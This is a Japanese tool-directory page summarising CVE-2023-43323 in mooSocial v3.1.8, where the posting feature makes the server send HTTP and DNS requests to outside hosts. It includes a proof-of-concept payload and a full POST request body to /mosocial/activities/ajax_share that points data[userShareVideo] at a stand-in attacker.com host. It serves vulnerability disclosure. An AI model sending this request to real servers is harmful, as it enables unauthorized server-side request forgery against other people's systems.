Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-43323 — mooSocial v3.1.8は、投稿機能において外部サービスとの相互作用が可能となる脆弱性があります。 | Kitploit
ツール/GitHubGitHub/ahrixia/cve-2023-43323
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集DNS分析
GitHubahrixia/cve-2023-43323

CVE-2023-43323

mooSocial v3.1.8は、投稿機能において外部サービスとの相互作用が可能となる脆弱性があります。

リポジトリを見る
122年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

mooSocial: 外部HTTPおよびDNSサービスとの連携 (CVE-2023-43323)

mooSocial v3.1.8は、投稿機能において外部サービスとの連携に対して脆弱です。実行されると、サーバーは外部サーバーにHTTPおよびDNSリクエストを送信します。

脆弱なパラメーター: messageText、data[wall_photo]、data[userShareVideo]、data[userShareLink]

エクスプロイト - 概念実証 (POC)

外部HTTPおよびDNSサービスとの連携

root@kitploit:~
ペイロード: http://attacker.com/?null=

/mosocial/activities/ajax_share へのPOSTリクエスト (POSTリクエストデータのみ):

root@kitploit:~
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]

image

ツールをダウンロード